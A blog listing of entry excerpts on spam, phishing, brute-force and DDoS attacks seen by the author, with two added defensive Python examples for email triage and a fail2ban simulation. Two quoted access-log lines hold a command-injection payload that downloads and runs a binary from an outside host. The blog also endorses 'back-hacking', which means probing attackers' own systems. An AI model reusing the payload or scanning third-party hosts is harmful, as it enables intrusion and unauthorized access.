Back-Hacking

Back-Hacker Blog

Member for

6 months 4 weeks
Submitted by AlReaud on Sun, 11/13/2016 - 14:17

The Back-Hacking Blog came into existence around December 2011 after I started using Kali Linux. It comes from the idea of defending against hackers in a manner similar to Krav Maga. The putative system or security administrator doesn't just sit there passively receiving attacks; rather, in the background they start probing the intruder's system, looking for weaknesses and exploits and using all of the tools available. However, make sure you read that first Back-Hacking link (and this one). There are legal, ethical and logistical questions to be addressed. Sometimes it is quite effective, as related in SunTrust Spoof: Additional ways of protecting your SunTrust access. The other side of the coin is that it is not for the uninitiated. You may compromise your systems, open yourself or your organization to legal liability or criminal prosecution depending on your jurisdiction, and/or straight up waste your time. My personal position is that it is like carrying a concealed weapon, to be used only justifiably in self-defense.

Hitting the nail on the head...

Submitted by AlReaud on Mon, 10/31/2016 - 18:33

Since publishing the article “Beware those scam emails from .top, .stream and .download domains” I must have pissed somebody off by giving some good advice. Since then I've been literally inundated with spam emails from the domains .top, .stream, .download and .win. When I cleared the junk filters out, I had almost 800 junk emails for the week of Sunday, October 23 - Saturday, October 29, 2016. This week the count is at 132 so far (see image below)! That previous weekly total is more than I usually get in a month. Further, I've had some idiot with an email address something like dhawalnator[at]gmail.com emailing Toyota and Hyundai dealerships in San Jose, Fresno, and other cities in California, giving my phone number and saying that I'm interested in a vehicle. Actually it's kind of funny, because I answer the calls and tell them that they are sadly the victims of a retaliatory email scam. That went on all last week. I need one of those dealerships to forward that email to alreaud[at]happycattech.com so I can analyze it.

This leads me to believe that I gave out good advice that is effective in preventing email phishers/scammers from being successful. So I'll give y'all another piece of advice, gratis. Use the Thunderbird email browser. It has one of the best

Beware those scam emails from .top, .stream and .download domains

Submitted by AlReaud on Mon, 10/03/2016 - 17:43

Since the advent of the .top, .stream, and .download domains there has been a plethora of new spam emails flooding the Internet. This comes from the cheap hosting accounts available from many providers. Hosting providers have no incentive to stop it, however, because they are making money from hosting questionable accounts, and there are technical and legal challenges to stopping spam.

Spotting the scam emails is pretty easy: they usually come from strange addresses ending in .top, .stream, or .download, but can come from other domains, with entreaties to protect children, etc. Usually, but not always, the emails contain only images, and the links are very ephemeral. The most important thing you can do to protect yourself from these is to DISABLE REMOTE CONTENT (search for how to do so in your specific email client). The next most important thing, other than marking them as spam and deleting them immediately, is to set filters that mark and delete email from .top, .stream, and .download domains.

By disabling remote content, the image that is usually enclosed in the spam email isn't downloaded. That prevents the server the image is fetched from (usually a compromised host that these links redirect through) from learning that your email address is valid and that the message was opened. It can learn this because, as seen below, the embedded links in the email carry a unique token that is associated with your email address: fetching the image is the same as telling the sender "this address reads mail".
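As an added example (not code from the original post), here is how the two defences above translate into a check one can run over a raw message before rendering it: it pulls the From: domain and compares its TLD against the filter list, lists every remote image a mail client would fetch if remote content were enabled, and looks for the opaque per-recipient token in those links. The two sample messages, the promo-example.top sender and the token value are constructed for the example; the token pattern (a long hex or base64-like path segment or query value) is an assumption about what such beacons usually look like.

```python
import re
from email import message_from_bytes, policy
from email.utils import parseaddr
from urllib.parse import parse_qs, urlsplit

# TLDs the post recommends filtering outright.
BLOCKED_TLDS = {"top", "stream", "download", "win"}

# Assumed shape of a per-recipient beacon token: a long opaque hex or
# base64-ish string used as a path segment or query value.
TOKEN_RE = re.compile(r"^[0-9a-f]{24,}$|^[A-Za-z0-9_-]{32,}$")

# img src= and a href= values in the HTML part (good enough for triage).
REF_RE = re.compile(r"""<(img|a)\b[^>]*?\b(?:src|href)\s*=\s*["']([^"']+)["']""", re.I)

# Constructed sample messages, not real spam from the post.
SPAM_MSG = b"""From: "Child Safety Alert" <alerts@promo-example.top>
To: victim@example.com
Subject: Protect your children today
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="http://click.promo-example.top/r/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6">
<img src="http://img.promo-example.top/i/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.jpg"></a>
<img src="http://trk.promo-example.top/o.gif?u=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" width="1" height="1">
</body></html>
"""

CLEAN_MSG = b"""From: Alice <alice@example.com>
To: victim@example.com
Subject: lunch?
Content-Type: text/plain; charset="utf-8"

Noon at the usual place?
"""


def sender_domain(msg):
    """Domain part of the From: address, lower-cased."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def remote_refs(msg):
    """(tag, url) pairs for every http(s) image or link in the HTML parts."""
    refs = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for tag, url in REF_RE.findall(part.get_content()):
            if url.lower().startswith(("http://", "https://")):
                refs.append((tag.lower(), url))
    return refs


def tracking_tokens(refs):
    """Opaque per-recipient tokens found in path segments or query values."""
    tokens = set()
    for _, url in refs:
        parts = urlsplit(url)
        # Strip a file extension so ".../TOKEN.jpg" still yields TOKEN.
        candidates = [seg.rsplit(".", 1)[0] for seg in parts.path.split("/") if seg]
        for values in parse_qs(parts.query).values():
            candidates.extend(values)
        tokens.update(c for c in candidates if TOKEN_RE.match(c))
    return tokens


def triage(raw):
    """Classify one raw RFC 5322 message and report what a filter would act on."""
    msg = message_from_bytes(raw, policy=policy.default)
    domain = sender_domain(msg)
    tld = domain.rpartition(".")[2]
    refs = remote_refs(msg)
    images = [url for tag, url in refs if tag == "img"]
    tokens = sorted(tracking_tokens(refs))
    reasons = []
    if tld in BLOCKED_TLDS:
        reasons.append(f"sender TLD .{tld}")
    if images:
        reasons.append(f"{len(images)} remote image(s) would be fetched on open")
    if tokens:
        reasons.append("recipient-specific token in remote links")
    # Verdict: blocked TLD or a beacon token; a remote image alone is only reported.
    return {"sender_domain": domain, "remote_images": images, "tokens": tokens,
            "spam": tld in BLOCKED_TLDS or bool(tokens), "reasons": reasons}


if __name__ == "__main__":
    for raw in (SPAM_MSG, CLEAN_MSG):
        print(triage(raw))
```

The `remote_images` list is exactly the set of fetches that "disable remote content" suppresses; the `tokens` list is the signature that would identify you if any of them were fetched. The TLD rule is the sender-domain filter from the post, expressed as a set lookup so more TLDs can be added as they turn up.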

Five examples are (the redirects were followed with the text-only browser Lynx, with Wireshark capturing the packets; PLEASE DON'T FOLLOW ANY OF THE LINKS BELOW UNLESS YOU ABSOLUTELY KNOW WHAT YOU ARE DOING!):

Very Quiet on the Server Front

Submitted by AlReaud on Tue, 01/10/2012 - 22:21

NOTE: Updated 11/15/2016

Unusually so, actually. Some of the methods may be working. Attack vectors cycle through periodically, some brute-forcing root, some brute-forcing non-existent accounts. I still haven't figured out how to trap the password strings coming in on the brute-forcing. The majority of attacks last week came from CN, then US.

The activity has shifted to the online servers, where I occasionally get DoS attacks. The GoDaddy servers throttle down if they sense one going on, but sometimes mistake valid activity for a DoS attack. All that takes latency to a 3-7 second level, which is OK as long as it stays on the lower end.

A new tool that I'm learning is Metasploit. An excellent penetration testing tool, but with a fairly steep learning curve. Maybe one of these days I'll make enough money to buy the pro version…

Dissecting a Spoof Craigslist Email

Submitted by AlReaud on Tue, 12/27/2011 - 09:29

NOTE: Updated 11/15/2016

Today's blog entry will cover a little live action. This is a continuation of the attacks from French domains. Contrary to popular belief, all online attacks DO NOT ORIGINATE FROM CHINA!

Following the receipt of the below email, I examined the email in detail (clicking on the image opens a full size image in another tab or window).

Craigslist phishing email attempting to get your login.

The most important above is that when you hover over the link, you can see in the status bar

Punishment DDoS attacks on online server

Submitted by AlReaud on Sat, 12/24/2011 - 08:16

NOTE: Updated 11/15/2016

Attacks have ceased pretty much on the testing server, but I must have pissed somebody off last night. WOOT!

DDoS attacks started in the late evening, probably around 21:00, and ran until at least midnight. I can't actually tell because I can't access the httpd logs. The positive note is that this led to me asking GoDaddy where the httpd logs are, something I wasn't aware of (in FTP Manager). Bluehost allows access to the server logs, but Yahoo did not when I used them. It's a virtual machine, so the logs don't compromise any hosting provider confidential data...

The offending IP addresses were:

  • 91.121.170.124 - FR. I know the botnet there, and they have been getting inverse “Pavlovian Dog” training. I am almost willing to bet the control node resides in this general IP area,

Rise of the Machine. A week of wetware against bots...

Submitted by AlReaud on Fri, 12/23/2011 - 10:12

Note: Updated 11/13/2016

A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.

One of the most interesting, attack-wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:

161.139.195.191 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602

161.139.195.191 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168

Don't waste your time, folks, I penetration test my own systems regularly for weaknesses,

Persistent attacks from one IP in India

Submitted by AlReaud on Mon, 12/12/2011 - 08:10

NOTE: Updated 11/15/2016

Today's memorable entry is from Trivandrum, Kerala, India, in the State of Delhi: 117.243.250.249

They are memorable because for some reason fail2ban didn't trap them. So they got to attack the shell 495 times instead of the nominal five. Zenmap indicates an unusual setup, with some open ports that are normally filtered, and things not normally seen, such as ipp, wpgs, route, and sip. An unknown port is open at 20717.

OpenVAS reports 14 low-level weaknesses, with a server running at port 631. My interpretation of that is that the hacking is intentional, because the absence of weaknesses somewhat eliminates unintentional bots, as with the church last week. Most of the systems examined so far have certain weaknesses present, such as HTTP TRACE. This IP is clean of even moderate weaknesses.

Makes one wonder why they waste their

Sea Change in Attack Vectors

Submitted by AlReaud on Thu, 12/08/2011 - 12:29

NOTE: Updated 11/15/2016

There's been a sea change in the attack vectors coming into the testing server, and some interesting characters.

For approximately two weeks, we've been subject to "IP Agile" attacks. The term "IP Agile" is borrowed from a piece of high-end R&D lab equipment, a Fluke frequency-agile signal generator. The "IP Agile" attackers use numerous IP addresses that repeat only occasionally over a span of hours, evading tools like fail2ban. There also seems to be a specific cycle through countries: China, Brazil, Japan, EU (UK or France), Taiwan, then repeating, though I don't yet have enough data.
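The India entry above (fail2ban let 495 attempts through instead of the nominal five) and the "IP Agile" pattern here are the same failure mode seen from two sides: fail2ban counts failures per source IP inside a `findtime` window, so an attacker that spaces attempts out past the window, or spreads them across many addresses, never reaches `maxretry` on any one key. As an added example (not from the post), this reproduces that counting over a constructed auth.log with three attackers and shows which ones each pivot key catches. The addresses other than 117.243.250.249 are documentation ranges, and the usernames, timings and the 5-in-600-seconds defaults are assumptions for the example.

```python
import re
from collections import defaultdict, deque, namedtuple
from datetime import datetime

Event = namedtuple("Event", "ts user ip")

# OpenSSH "Failed password" line, with or without "invalid user".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def _burst(ip, user, start, count, step):
    """Constructed failure lines: `count` attempts from one IP, `step` seconds apart."""
    who = "root" if user == "root" else f"invalid user {user}"
    lines = []
    for i in range(count):
        t = start + i * step
        stamp = f"{t // 3600:02d}:{t % 3600 // 60:02d}:{t % 60:02d}"
        lines.append(f"Dec 12 {stamp} srv sshd[{2000 + i}]: Failed password for "
                     f"{who} from {ip} port {40000 + i} ssh2")
    return lines


ROTATING_IPS = ["203.0.113.10", "198.51.100.20", "192.0.2.30",
                "203.0.113.11", "198.51.100.21", "192.0.2.31"]

# Constructed auth.log: a fast single-IP brute force, an "IP agile" attacker that
# rotates addresses against one account, a slow single-IP attacker, and two noise lines.
AUTH_LOG = (
    _burst("117.243.250.249", "root", 8 * 3600 + 1, 6, 2)
    + [_burst(ip, "admin", 8 * 3600 + 600 + 20 * i, 1, 0)[0]
       for i, ip in enumerate(ROTATING_IPS)]
    + _burst("198.51.100.77", "oracle", 8 * 3600 + 1200, 6, 180)
    + ["Dec 12 08:30:00 srv sshd[3000]: Accepted publickey for alice from 192.0.2.5 port 50000 ssh2",
       "Dec 12 08:30:01 srv CRON[10]: (root) CMD (run-parts /etc/cron.hourly)"]
)


def parse(lines, year=2011):
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append(Event(ts, m["user"], m["ip"]))
    return events


def threshold_hits(events, key, maxretry=5, findtime=600):
    """Keys that accumulate `maxretry` failures inside a sliding `findtime`-second
    window. With key=ip this is the fail2ban sshd-jail rule; returns {key: ban time}."""
    window = defaultdict(deque)
    hits = {}
    for ev in sorted(events, key=lambda e: e.ts):
        k = key(ev)
        if k in hits:
            continue                       # already banned, as fail2ban would have
        q = window[k]
        q.append(ev.ts)
        while (ev.ts - q[0]).total_seconds() > findtime:
            q.popleft()                    # expire attempts older than findtime
        if len(q) >= maxretry:
            hits[k] = ev.ts
    return hits


def summarize(lines, findtime=600):
    events = parse(lines)
    return {
        "events": len(events),
        "by_ip": threshold_hits(events, lambda e: e.ip, findtime=findtime),
        "by_user": threshold_hits(events, lambda e: e.user, findtime=findtime),
    }


if __name__ == "__main__":
    for ft in (600, 3600):
        r = summarize(AUTH_LOG, findtime=ft)
        print(f"findtime={ft}: by_ip={sorted(r['by_ip'])} by_user={sorted(r['by_user'])}")
```

With the defaults only the fast attacker is banned: the rotating set never puts more than one failure on any IP, and the slow attacker's sixth attempt is twelve minutes after its first, so at most four ever sit in the window. Keying the same counter on the target username catches the rotating set, and raising `findtime` to an hour catches the slow one, which is the trade-off the post is running into: the per-IP key is what makes fail2ban cheap, and it is also exactly what "IP agile" traffic is shaped to defeat.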

This set of attackers seems to be hitting mail servers and private branch exchange (PBX) servers mostly. Found a great site at a church in Lafayette, IN that had their website infested. The trick was that you only saw the spam if you had JavaScript disabled. Called them up and spoke to a parishioner manning the phones, and followed